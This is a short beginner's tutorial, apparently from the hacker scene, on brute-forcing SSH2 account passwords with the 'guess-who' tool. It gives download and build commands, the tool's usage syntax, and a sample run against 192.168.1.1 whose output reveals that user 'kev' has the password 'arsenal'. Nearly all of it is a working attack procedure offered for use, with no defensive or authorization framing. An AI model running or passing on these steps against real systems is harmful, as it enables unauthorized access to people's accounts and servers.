Brute Force ssh (for n00bs)
Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts.
It is available from http://packetstormsecurity.org/
Required Files and programs
It is NOT required to download ALL files here. Please read CAREFULLY!
Choose 1 from the following:
guess-who-0.44.tgz (16.1 KB) - Linux program to Brute Force SSH
In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files
uumerge.zip (55.1 KB) Wind0ws merging program
- The following are to be chosen if you want to create personalized password files.
Download to the desired directory
tar -zxvf guess-who-0.44.tgz make
[root@hacker guess-who]# ./b guess-who SSH2 parallel passwd bruter (C) 2002 by firstname.lastname@example.org Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries] Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file
[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt (!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ] [ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]
As you can see the user kev has a password of arsenal